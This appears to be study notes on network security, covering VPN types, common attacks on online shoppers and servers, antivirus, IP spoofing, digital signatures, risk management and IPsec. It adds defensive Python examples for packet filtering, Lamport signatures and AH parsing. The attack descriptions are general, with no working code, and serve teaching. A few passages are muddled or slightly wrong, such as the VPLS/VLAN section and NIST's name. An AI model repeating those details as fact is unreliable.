Virtual private wire and private line services (VPWS and VPLS) In both of these services, the provider does not offer a full routed or bridged network, but components from which the customer can build customer-administered networks. VPWS are point-to-point while VPLS can be point-to-multipoint. They can be Layer 1 emulated circuits with no data link structure. The customer determines the overall customer VPN service, which also can involve routing, bridging, or host network elements. An unfortunate acronym confusion can occur between Virtual Private Line Service and Virtual Private LAN Service; the context should make it clear whether "VPLS" means the layer 1 virtual private line or the layer 2 virtual private LAN.

Virtual LAN

A Layer 2 technique that allows for the coexistence of multiple LAN broadcast domains, interconnected via trunks using the IEEE 802.1Q trunking protocol. Other trunking protocols have been used but have become obsolete, including Inter-Switch Link (ISL), IEEE 802.10 (originally a security protocol, but a subset was introduced for trunking), and ATM LAN Emulation (LANE).

Virtual private LAN service (VPLS)

Developed by IEEE, VLANs allow multiple tagged LANs to share common trunking. VLANs frequently comprise only customer-owned facilities. Virtual private line service (the layer 1 sense of "VPLS" noted above) supports emulation of both point-to-point and point-to-multipoint topologies. The method discussed here extends Layer 2 technologies such as 802.1d and 802.1q LAN trunking to run over transports such as Metro Ethernet. As used in this context, a VPLS is a Layer 2 PPVPN, rather than a private line, emulating the full functionality of a traditional local area network (LAN). From a user standpoint, a VPLS makes it possible to interconnect several LAN segments over a packet-switched, or optical, provider core; a core transparent to the user, making the remote LAN segments behave as one single LAN. In a VPLS, the provider network emulates a learning bridge, which optionally may include VLAN service.

Categorizing VPN security models

From the security standpoint, VPNs either trust the underlying delivery network, or must enforce security with mechanisms in the VPN itself. Unless the trusted delivery network runs only among physically secure sites, both trusted and secure models need an authentication mechanism for users to gain access to the VPN. Some Internet service providers as of 2009 offer managed VPN service for business customers who want the security and convenience of a VPN but prefer not to undertake administering a VPN server themselves. Managed VPNs go beyond PPVPN scope, and are a contracted security solution that can reach into hosts. In addition to providing remote workers with secure access to their employer's internal network, other security and management services are sometimes included as part of the package. Examples include keeping anti-virus and anti-spyware programs updated on each client's computer.

Mobile virtual private network

Mobile VPNs apply standards-based authentication and encryption technologies to secure communications with mobile devices and to protect networks from unauthorized users. Designed for wireless environments, mobile VPNs provide an access solution for mobile users who require secure access to information and applications over a variety of wired and wireless networks. Mobile VPNs allow users to roam seamlessly across IP-based networks and in and out of wireless-coverage areas without losing application sessions or dropping the secure VPN session. For instance, highway patrol officers require access to mission-critical applications as they travel between different subnets of a mobile network, much as a cellular radio has to hand off its link to repeaters at different cell towers. The Host Identity Protocol (HIP), at the time under study by the Internet Engineering Task Force and since published as RFC 7401, is designed to support mobility of hosts by separating the role of IP addresses for host identification from their locator functionality in an IP network. With HIP, a mobile host maintains its logical connections established via the host identity identifier while associating with different IP addresses when roaming between access networks.

A-5 Attacks
Attack methods from an attacker or hacker.

Tricking the shopper
Some of the easiest and most profitable attacks are based on tricking the shopper, also known as social engineering techniques. These attacks involve surveillance of the shopper's behavior, gathering information to use against the shopper. For example, a mother's maiden name is a common challenge question used by numerous sites. If one of these sites is tricked into giving away a password once the challenge question is provided, then not only has this site been compromised, but it is also likely that the shopper used the same logon ID and password on other sites.

A common scenario is that the attacker calls the shopper, pretending to be a representative from a site visited, and extracts information. The attacker then calls a customer service representative at the site, posing as the shopper and providing personal information. The attacker then asks for the password to be reset to a specific value.

Another common form of social engineering attack is the phishing scheme. Typo pirates play on the names of famous sites to collect authentication and registration information. For example, http://www.ibm.com/shop is registered by the attacker as www.ibn.com/shop. A shopper mistypes and enters the illegitimate site and provides confidential information. Alternatively, the attacker sends emails spoofed to look like they came from legitimate sites. The link inside the email maps to a rogue site that collects the information.

Snooping the shopper's computer
Millions of computers are added to the Internet every month. Most users' knowledge of security vulnerabilities of their systems is vague at best. Additionally, software and hardware vendors, in their quest to ensure that their products are easy to install, will ship products with security features disabled. In most cases, enabling security features requires a non-technical user to read manuals written for the technologist. The confused user does not attempt to enable the security features. This creates a treasure trove for attackers. A popular technique for gaining entry into the shopper's system is to use a tool, such as SATAN, to perform port scans on a computer that detect entry points into the machine. Based on the opened ports found, the attacker can use various techniques to gain entry into the user's system. Upon entry, they scan your file system for personal information, such as passwords. While software and hardware security solutions available protect the public's systems, they are not silver bullets. A user that purchases firewall software to protect his computer may find there are conflicts with other software on his system. To resolve the conflict, the user disables enough capabilities to render the firewall software useless.

Sniffing the network
In this scheme, the attacker monitors the data between the shopper's computer and the server. He collects data about the shopper or steals personal information, such as credit card numbers. There are points in the network where this attack is more practical than others. If the attacker sits in the middle of the network, then within the scope of the Internet, this attack becomes impractical. A request from the client to the server computer is broken up into small pieces known as packets as it leaves the client's computer and is reconstructed at the server. The packets of a request are sent through different routes. The attacker cannot access all the packets of a request and cannot decipher what message was sent.


Figure 4. Attacker sniffing the network between client and server

Guessing passwords
Another common attack is to guess a user's password. This style of attack is manual or automated. Manual attacks are laborious, and only successful if the attacker knows something about the shopper, for example, if the shopper uses their child's name as the password. Automated attacks have a higher likelihood of success, because the probability of guessing a user ID/password combination becomes more significant as the number of tries increases. Tools exist that use all the words in the dictionary to test user ID/password combinations, or that attack popular user ID/password combinations. The attacker can automate the attack to go against multiple sites at one time.

Using denial of service attacks
The denial of service attack is one of the best examples of impacting site availability. It involves getting the server to perform a large number of mundane tasks, exceeding the capacity of the server to cope with any other task. For example, if everyone in a large meeting asks you your name all at once, and every time you answer, they ask you again, you have experienced a personal denial of service attack. To ask a computer its name, you use ping. You can use ping to build an effective DoS attack. The smart hacker gets the server to use more computational resources in processing the request than the adversary does in generating the request. Distributed DoS is a type of attack used on popular sites, such as Yahoo! In this type of attack, the hacker infects computers on the Internet via a virus or other means. The infected computers become slaves to the hacker. Denial of service attacks:


Using known server bugs
The attacker analyzes the site to find what types of software are used on the site. He then proceeds to find what patches were issued for the software. Additionally, he searches on how to exploit a system without the patch. He proceeds to try each of the exploits. The sophisticated attacker finds a weakness in a similar type of software, and tries to use that to exploit the system. This is a simple, but effective attack. With millions of servers online, what is the probability that a system administrator forgot to apply a patch?

Using server root exploits
Root exploits refer to techniques that gain super user access to the server. This is the most coveted type of exploit because the possibilities are limitless. When you attack a shopper or his computer, you can only affect one individual. With a root exploit, you gain control of the merchant's and all the shoppers' information on the site. There are two main types of root exploits: buffer overflow attacks and executing scripts against a server. In a buffer overflow attack, the hacker takes advantage of a specific type of program bug that involves the allocation of storage during program execution. The technique involves tricking the server into executing code written by the attacker. The other technique uses knowledge of scripts that are executed by the server. This is easily and freely found in the programming guides for the server. The attacker tries to construct scripts in the URL of his browser to retrieve information from the server. This technique is frequently used when the attacker is trying to retrieve data from the server's database.

A-6 Antivirus Technologies
A computer virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. The term virus is often extended to refer to computer worms and other sorts of malware. The most common are:
• Viruses - A virus is a small piece of software that piggybacks on other programs or files. Each time the program runs or file opens, the virus runs, too. It can reproduce itself by attaching to other programs or files or wreak havoc.
• E-mail viruses - An e-mail virus moves around in e-mail messages, and usually replicates itself by automatically mailing itself to dozens of people in the victim's e-mail address book. Pharmers send e-mails containing a virus that installs small software programs on users' computers. When a user tries to go to the bank's real Web site, the program redirects the browser to the pharmer's fake site. It then asks a user to update information such as logons, PIN codes or other sensitive information.
• Worms - A worm is a small piece of software that uses computer networks and security holes to replicate itself. A copy of the worm scans the network for another machine that has a specific security hole. It copies itself to the new machine using the security hole, and then starts replicating from there, as well.
• Trojan horses - A Trojan horse is simply a computer program which claims to do one thing but instead does damage, such as erasing your hard disk when you run it. Trojan horses have no way to replicate automatically.

Anti-virus software and other countermeasures
There are many anti-virus software products available that can detect and eliminate known viruses. Some virus scanners can also warn a user if a file is likely to contain a virus based on the file type. Some antivirus vendors also claim the effective use of other types of heuristic analysis, which work by examining the contents of the computer's memory (its RAM, and boot sector) and the files stored on fixed or removable drives (hard drives, floppy drives), and comparing those files against a database of known virus "signatures". Some anti-virus programs are able to scan opened files in addition to sent and received emails 'on the fly' in a similar manner. This practice is known as "on-access scanning." Anti-virus software typically does not change the underlying capability of host software to transmit viruses. Anti-virus software must be updated regularly for the latest threats and hoaxes. Antivirus software typically has a host-based version for individual PCs and workstations and a gateway version to protect a network or a subnetwork. Now, antivirus technologies are often combined with other technologies such as anti-spam, anti-spyware, firewalls and intrusion detection to provide broader protection to end users. Anti-virus systems are traditionally software solutions. When one system is performing multiple functions such as scanning for viruses, spam and spyware and detecting and blocking intrusions, performance becomes one of the main concerns. To increase the performance of such integrated gateways and reduce the delay of messages passing through, many integrated gateway products are migrating from pure software products to a combination of hardware and software. Now, many integrated gateways have achieved line speed at the gigabit or multi-gigabit level.



A-7 In computer networking, the term IP address spoofing or IP spoofing refers to the creation of Internet Protocol (IP) packets with a forged source IP address, called spoofing, with the purpose of concealing the identity of the sender or impersonating another computing system.

Background
The basic protocol for sending data over the Internet network and many other computer networks is the Internet Protocol ("IP"). The header of each IP packet contains, among other things, the numerical source and destination address of the packet. The source address is normally the address that the packet was sent from. By forging the header so it contains a different address, an attacker can make it appear that the packet was sent by a different machine. The machine that receives spoofed packets will send a response back to the forged source address, which means that this technique is mainly used when the attacker does not care about the response or the attacker has some way of guessing the response. In certain cases, it might be possible for the attacker to see or redirect the response to his own machine. The most usual case is when the attacker is spoofing an address on the same LAN or WAN. In this way the attacker gains unauthorized access to computers.

Applications
IP spoofing is most frequently used in denial-of-service attacks. In such attacks, the goal is to flood the victim with overwhelming amounts of traffic, and the attacker does not care about receiving responses to the attack packets. Packets with spoofed addresses are thus suitable for such attacks. They have additional advantages for this purpose: they are more difficult to filter since each spoofed packet appears to come from a different address, and they hide the true source of the attack. Denial of service attacks that use spoofing typically randomly choose addresses from the entire IP address space, though more sophisticated spoofing mechanisms might avoid unroutable addresses or unused portions of the IP address space.
The proliferation of large botnets makes spoofing less important in denial of service attacks, but attackers typically have spoofing available as a tool, if they want to use it, so defenses against denial-of-service attacks that rely on the validity of the source IP address in attack packets might have trouble with spoofed packets. Backscatter, a technique used to observe denial-of-service attack activity in the Internet, relies on attackers' use of IP spoofing for its effectiveness.

IP spoofing can also be a method of attack used by network intruders to defeat network security measures, such as authentication based on IP addresses. This method of attack on a remote system can be extremely difficult, as it involves modifying thousands of packets at a time. This type of attack is most effective where trust relationships exist between machines. For example, it is common on some corporate networks to have internal systems trust each other, so that users can log in without a username or password provided they are connecting from another machine on the internal network (and so must already be logged in). By spoofing a connection from a trusted machine, an attacker may be able to access the target machine without authentication.

Another more-recent use is to change a computer's country of origin for the purposes of accessing internet content limited to specific geopolitical areas. For example, Hulu's online-tv service can only be accessed by American residents, but theoretically also by computers spoofing American locations.

Services vulnerable to IP spoofing
Configuration and services that are vulnerable to IP spoofing:
• RPC (Remote Procedure Call services)
• Any service that uses IP address authentication
• The X Window system
• The R services suite (rlogin, rsh, etc.)

Defense against spoofing
Packet filtering is one defense against IP spoofing attacks. The gateway to a network usually performs ingress filtering, which is blocking of packets from outside the network with a source address inside the network. This prevents an outside attacker spoofing the address of an internal machine. Ideally the gateway would also perform egress filtering on outgoing packets, which is blocking of packets from inside the network with a source address that is not inside. This prevents an attacker inside the filtering network from launching IP spoofing attacks against external machines. It is also recommended to design network protocols and services so that they do not rely on the IP source address for authentication.
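As an added example (not part of the assignment's own text), the ingress and egress checks just described written out for a gateway whose internal address space is the constructed INTERNAL_NETS; Packet, gateway_filter and the sample traffic are assumptions made for this demo only.

```python
import ipaddress
from dataclasses import dataclass

# Constructed example: the address blocks the gateway treats as "inside".
# These prefixes are assumptions for the demo, not values from the page.
INTERNAL_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.168.1.0/24"),
]


@dataclass(frozen=True)
class Packet:
    src: str         # source IP address as written in the IP header
    dst: str         # destination IP address
    arrived_on: str  # gateway interface the packet came in on: "outside" or "inside"


def is_internal(addr: str) -> bool:
    """True if addr falls inside one of the gateway's internal prefixes."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def is_martian(addr: str) -> bool:
    """Sources that can never legitimately arrive from the Internet
    (loopback, link-local, multicast, IETF reserved)."""
    ip = ipaddress.ip_address(addr)
    return ip.is_loopback or ip.is_link_local or ip.is_multicast or ip.is_reserved


def gateway_filter(pkt: Packet) -> tuple:
    """Apply ingress and egress filtering; returns (verdict, reason).

    Ingress: a packet arriving from outside must not claim an inside source.
    Egress:  a packet arriving from inside must not claim an outside source.
    """
    src_internal = is_internal(pkt.src)
    if pkt.arrived_on == "outside":
        if src_internal:
            return ("drop", "ingress: external packet claims an internal source")
        if is_martian(pkt.src):
            return ("drop", "ingress: unroutable (martian) source address")
        return ("accept", "ingress: source consistent with outside interface")
    if pkt.arrived_on == "inside":
        if not src_internal:
            return ("drop", "egress: internal packet claims an external source")
        return ("accept", "egress: source consistent with inside interface")
    raise ValueError(f"unknown interface {pkt.arrived_on!r}")


def filter_batch(packets):
    """Run the filter over a list of packets; returns the verdict for each."""
    return [gateway_filter(p) for p in packets]


# Constructed sample traffic, labelled by where each packet entered the gateway.
SAMPLE_PACKETS = [
    Packet("203.0.113.7", "10.1.2.3", "outside"),     # genuine external client
    Packet("10.1.2.3", "10.1.2.4", "outside"),        # spoofed internal source: ingress drop
    Packet("127.0.0.1", "10.1.2.3", "outside"),       # martian source: ingress drop
    Packet("10.1.2.3", "198.51.100.9", "inside"),     # genuine internal host going out
    Packet("198.51.100.9", "203.0.113.7", "inside"),  # spoofed external source: egress drop
]

if __name__ == "__main__":
    for pkt, (verdict, reason) in zip(SAMPLE_PACKETS, filter_batch(SAMPLE_PACKETS)):
        print(f"{pkt.arrived_on:7} {pkt.src:>15} -> {pkt.dst:<15} {verdict:6} {reason}")
```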

A-8 A digital signature or digital signature scheme is a mathematical scheme for demonstrating the authenticity of a digital message or document. A valid digital signature gives a recipient reason to believe that the message was created by a known sender, and that it was not altered in transit. Digital signatures are commonly used for software distribution, financial transactions, and in other cases where it is important to detect forgery and tampering.

Digital signatures are often used to implement electronic signatures, a broader term that refers to any electronic data that carries the intent of a signature,[1] but not all electronic signatures use digital signatures.[2][3][4] In some countries, including the United States, and in the European Union, electronic signatures have legal significance. However, laws concerning electronic signatures do not always make clear whether they are digital cryptographic signatures in the sense used here, leaving the legal definition, and so their importance, somewhat confused.

Digital signatures employ a type of asymmetric cryptography. For messages sent through an insecure channel, a properly implemented digital signature gives the receiver reason to believe the message was sent by the claimed sender. Digital signatures are equivalent to traditional handwritten signatures in many respects; properly implemented digital signatures are more difficult to forge than the handwritten type. Digital signature schemes in the sense used here are cryptographically based, and must be implemented properly to be effective. Digital signatures can also provide non-repudiation, meaning that the signer cannot successfully claim they did not sign a message, while also claiming their private key remains secret; further, some non-repudiation schemes offer a time stamp for the digital signature, so that even if the private key is exposed, the signature is valid nonetheless. Digitally signed messages may be anything representable as a bitstring: examples include electronic mail, contracts, or a message sent via some other cryptographic protocol.

Definition

Diagram showing how a simple digital signature is applied and then verified

A digital signature scheme typically consists of three algorithms:
• A key generation algorithm that selects a private key uniformly at random from a set of possible private keys. The algorithm outputs the private key and a corresponding public key.
• A signing algorithm which, given a message and a private key, produces a signature.
• A signature verifying algorithm which, given a message, public key and a signature, either accepts or rejects.
Two main properties are required. First, a signature generated from a fixed message and fixed private key should verify on that message and the corresponding public key. Secondly, it should be computationally infeasible to generate a valid signature for a party who does not possess the private key.
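The three algorithms and the two required properties, shown as an added example rather than code from the page: a Lamport one-time signature built only from SHA-256 and random bytes, chosen because it needs no external library. keygen, sign, verify and the constructed order message in demo() are this example's own names.

```python
import hashlib
import secrets

# Lamport one-time signature over SHA-256: one pair of secrets per digest bit.
N_BITS = 256
SECRET_LEN = 32


def _h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def keygen():
    """Key generation: the private key is chosen uniformly at random (a pair of
    random secrets per digest bit); the public key is the hash of each secret."""
    private_key = [(secrets.token_bytes(SECRET_LEN), secrets.token_bytes(SECRET_LEN))
                   for _ in range(N_BITS)]
    public_key = [(_h(s0), _h(s1)) for s0, s1 in private_key]
    return private_key, public_key


def _message_bits(message: bytes):
    """Bits of the message digest, most significant bit first."""
    digest = int.from_bytes(_h(message), "big")
    return [(digest >> (N_BITS - 1 - i)) & 1 for i in range(N_BITS)]


def sign(message: bytes, private_key):
    """Signing: for each digest bit, reveal the secret that belongs to that bit value.
    Revealing secrets is exactly why a Lamport key must sign only one message."""
    return [private_key[i][bit] for i, bit in enumerate(_message_bits(message))]


def verify(message: bytes, signature, public_key) -> bool:
    """Verification: every revealed secret must hash to the public value for the
    bit the message actually has. Any change to the message flips digest bits,
    so the revealed secrets stop matching; a forger without the private key
    would need preimages of the public values."""
    if len(signature) != N_BITS or len(public_key) != N_BITS:
        return False
    bits = _message_bits(message)
    return all(_h(s) == public_key[i][bits[i]] for i, s in enumerate(signature))


def demo():
    """Constructed run: sign one message, then check the two required properties
    (a genuine signature verifies; a tampered message or a wrong key is rejected)."""
    sk, pk = keygen()
    msg = b"Order 1234: pay 100.00 to merchant"   # constructed message
    sig = sign(msg, sk)
    genuine_ok = verify(msg, sig, pk)
    tampered_ok = verify(b"Order 1234: pay 900.00 to merchant", sig, pk)
    _, other_pk = keygen()
    wrong_key_ok = verify(msg, sig, other_pk)
    return genuine_ok, tampered_ok, wrong_key_ok


if __name__ == "__main__":
    print(demo())  # expected (True, False, False)
```

Signing a second message with the same Lamport key reveals further secrets, so production systems use reusable schemes such as RSA or ECDSA; the three-algorithm structure and the two properties are the same.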






A-9 Risk management is the identification, assessment, and prioritization of risks followed by coordinated and economical application of resources to minimize, monitor, and control the probability and/or impact of unfortunate events.[1] Risks can come from uncertainty in financial markets, project failures, legal liabilities, credit risk, accidents, natural causes and disasters as well as deliberate attacks from an adversary. Several risk management standards have been developed, including those of the Project Management Institute, the National Institute of Science and Technology, actuarial societies, and ISO standards.[2][3] Methods, definitions and goals vary widely according to whether the risk management method is in the context of project management, security, engineering, industrial processes, financial portfolios, actuarial assessments, or public health and safety. The strategies to manage risk include transferring the risk to another party, avoiding the risk, reducing the negative effect of the risk, and accepting some or all of the consequences of a particular risk. Certain aspects of many of the risk management standards have come under criticism for having no measurable improvement on risk even though the confidence in estimates and decisions increases.[1]

Introduction
This section provides an introduction to the principles of risk management. The vocabulary of risk management is defined in ISO Guide 73, "Risk management. Vocabulary".

In ideal risk management, a prioritization process is followed whereby the risks with the greatest loss and the greatest probability of occurring are handled first, and risks with lower probability of occurrence and lower loss are handled in descending order. In practice the process can be very difficult, and balancing between risks with a high probability of occurrence but lower loss versus a risk with high loss but lower probability of occurrence can often be mishandled.

Intangible risk management identifies a new type of risk that has a 100% probability of occurring but is ignored by the organization due to a lack of identification ability. For example, when deficient knowledge is applied to a situation, a knowledge risk materialises. Relationship risk appears when ineffective collaboration occurs. Process-engagement risk may be an issue when ineffective operational procedures are applied. These risks directly reduce the productivity of knowledge workers, decrease cost effectiveness, profitability, service, quality, reputation, brand value, and earnings quality. Intangible risk management allows risk management to create immediate value from the identification and reduction of risks that reduce productivity.

Risk management also faces difficulties allocating resources. This is the idea of opportunity cost. Resources spent on risk management could have been spent on more profitable activities. Again, ideal risk management minimizes spending while maximizing the reduction of the negative effects of risks.

Methodology

For the most part, these methodologies consist of the following elements, performed, more or less, in the following order.
1. identify, characterize, and assess threats
2. assess the vulnerability of critical assets to specific threats
3. determine the risk (i.e. the expected consequences of specific types of attacks on specific assets)
4. identify ways to reduce those risks
5. prioritize risk reduction measures based on a strategy

Principles of risk management

The International Organization for Standardization identifies the following principles of risk management:
• Risk management should create value.
• Risk management should be an integral part of organizational processes.
• Risk management should be part of decision making.
• Risk management should explicitly address uncertainty.
• Risk management should be systematic and structured.
• Risk management should be based on the best available information.
• Risk management should be tailored.
• Risk management should take into account human factors.
• Risk management should be transparent and inclusive.
• Risk management should be dynamic, iterative and responsive to change.
• Risk management should be capable of continual improvement and enhancement.

Process
According to the standard ISO 31000 "Risk management -- Principles and guidelines on implementation", the process of risk management consists of several steps as follows:
1. Identification of risk in a selected domain of interest
2. Planning the remainder of the process.
3. Mapping out the following:
   o the social scope of risk management
   o the identity and objectives of stakeholders
   o the basis upon which risks will be evaluated, constraints.
4. Defining a framework for the activity and an agenda for identification.
5. Developing an analysis of risks involved in the process.
6. Mitigation of risks using available technological, human and organizational resources.


A-10 Internet Protocol Security (IPsec) is a protocol suite for securing Internet Protocol (IP) communications by authenticating and encrypting each IP packet of a data stream. IPsec also includes protocols for establishing mutual authentication between agents at the beginning of the session and negotiation of cryptographic keys to be used during the session. IPsec can be used to protect data flows between a pair of hosts (e.g. computer users or servers), between a pair of security gateways (e.g. routers or firewalls), or between a security gateway and a host. [1]

IPsec is a dual mode, end-to-end, security scheme operating at the Internet Layer of the Internet Protocol Suite or OSI model Layer 3. Some other Internet security systems in widespread use, such as Secure Sockets Layer (SSL), Transport Layer Security (TLS) and Secure Shell (SSH), operate in the upper layers of these models. Hence, IPsec can be used for protecting any application traffic across the Internet. Applications need not be specifically designed to use IPsec. The use of TLS/SSL, on the other hand, must typically be incorporated into the design of applications.

IPsec is a successor of the ISO standard Network Layer Security Protocol (NLSP). NLSP was based on the SP3 protocol that was published by NIST, but designed by the Secure Data Network System project of the National Security Agency (NSA). IPsec is officially specified by the Internet Engineering Task Force (IETF) in a series of Request for Comments addressing various components and extensions, including the official capitalization style of the term.

Security architecture
The IPsec suite is a framework of open standards. IPsec uses the following protocols to perform various functions: [2][3]
• Internet key exchange (IKE and IKEv2) to set up a security association (SA) by handling negotiation of protocols and algorithms and to generate the encryption and authentication keys to be used by IPsec. [4][5]
• Authentication Header (AH) to provide connectionless integrity and data origin authentication for IP datagrams and to provide protection against replay attacks. [6]
• Encapsulating Security Payload (ESP) to provide confidentiality, data origin authentication, connectionless integrity, an anti-replay service (a form of partial sequence integrity), and limited traffic flow confidentiality. [7][1]

Authentication Header

Authentication Header (AH) is a member of the IPsec protocol suite. AH guarantees connectionless integrity and data origin authentication of IP packets. Further, it can optionally protect against replay attacks by using the sliding window technique and discarding old packets. AH protects the IP payload and all header fields of an IP datagram except for mutable fields (i.e. those that might be altered in transit). [6] In IPv4, mutable (and therefore unauthenticated) IP header fields include DSCP/TOS, Flags, Fragment Offset, TTL and Header Checksum. AH operates directly on top of IP, using IP protocol number 51.[8]


The following AH packet diagram shows how an AH packet is constructed and interpreted:

  0 - 7 bit       | 8 - 15 bit       | 16 - 23 bit      | 24 - 31 bit
  Next header     | Payload length   | RESERVED
  Security parameters index (SPI)
  Sequence number
  Authentication data (variable)

Field meanings:
Next header: The Next Header is an 8-bit field that identifies the type of the next payload after the Authentication Header. The value of this field is chosen from the set of IP Protocol Numbers defined in the most recent "Assigned Numbers" RFC from the Internet Assigned Numbers Authority. See List of IP protocol numbers.
Payload length: Size of AH packet.
RESERVED: Reserved for future use (all zero until then).
Security parameters index (SPI): Identifies the security parameters, which, in combination with the IP address, then identify the security association implemented with this packet.
Sequence number: A monotonically increasing number, used to prevent replay attacks.
Authentication data: Contains the integrity check value (ICV) necessary to authenticate the packet; it may contain padding.
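As an added example, not from the page: a parser for the AH layout above together with the sliding-window replay check that the Sequence number field supports. The Payload Len rule used here (32-bit words in the whole header, minus 2) is RFC 4302's; the SAMPLE_AH bytes, the ReplayWindow class and replay_demo are constructed for this demo, and ICV verification is left out because it needs the security association's key.

```python
import struct
from dataclasses import dataclass

IPPROTO_AH = 51     # AH sits directly on top of IP (protocol number 51)
AH_FIXED_LEN = 12   # Next Header, Payload Len, Reserved, SPI, Sequence Number


@dataclass
class AuthHeader:
    next_header: int
    payload_len: int
    spi: int
    seq: int
    icv: bytes      # Authentication data (integrity check value, may include padding)


def parse_ah(data: bytes) -> AuthHeader:
    """Parse an AH header from the start of `data`.

    Payload Len counts 32-bit words in the whole AH minus 2 (RFC 4302), so the
    header occupies (payload_len + 2) * 4 bytes; everything after the fixed
    12 bytes up to that boundary is the ICV.
    """
    if len(data) < AH_FIXED_LEN:
        raise ValueError("truncated AH: fewer than 12 bytes")
    next_header, payload_len, reserved, spi, seq = struct.unpack("!BBHII", data[:AH_FIXED_LEN])
    if reserved != 0:
        raise ValueError("RESERVED field must be zero")
    total_len = (payload_len + 2) * 4
    if total_len < AH_FIXED_LEN or len(data) < total_len:
        raise ValueError("Payload Len does not match the bytes available")
    return AuthHeader(next_header, payload_len, spi, seq, data[AH_FIXED_LEN:total_len])


class ReplayWindow:
    """Sliding-window anti-replay check on the AH sequence number.

    `top` is the highest sequence number accepted so far; bit i of `bitmap`
    records whether sequence number (top - i) has already been seen.
    """

    def __init__(self, size: int = 64):
        self.size = size
        self.top = 0
        self.bitmap = 0

    def accept(self, seq: int) -> bool:
        if seq == 0:                        # 0 is never a valid sequence number
            return False
        if seq > self.top:                  # newer than anything seen: slide the window
            shift = seq - self.top
            self.bitmap = ((self.bitmap << shift) | 1) & ((1 << self.size) - 1)
            self.top = seq
            return True
        diff = self.top - seq
        if diff >= self.size:               # older than the window: discard
            return False
        if self.bitmap & (1 << diff):       # already seen: replay
            return False
        self.bitmap |= 1 << diff            # late but new: accept and record
        return True


# Constructed sample: TCP (6) as next header, Payload Len 4, so a 24-byte AH
# carrying a 12-byte ICV (the HMAC-SHA1-96 size), followed by some payload bytes.
SAMPLE_AH = struct.pack("!BBHII", 6, 4, 0, 0x1234, 1) + b"\xaa" * 12 + b"payload..."


def replay_demo():
    """Feed a constructed sequence-number stream through a 64-entry window:
    in-order, replayed, late-but-new, a jump ahead, then one too old to accept."""
    w = ReplayWindow(64)
    return [w.accept(s) for s in (1, 3, 3, 2, 2, 100, 30, 40)]


if __name__ == "__main__":
    print(parse_ah(SAMPLE_AH))
    print(replay_demo())  # expected [True, True, False, True, False, True, False, True]
```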
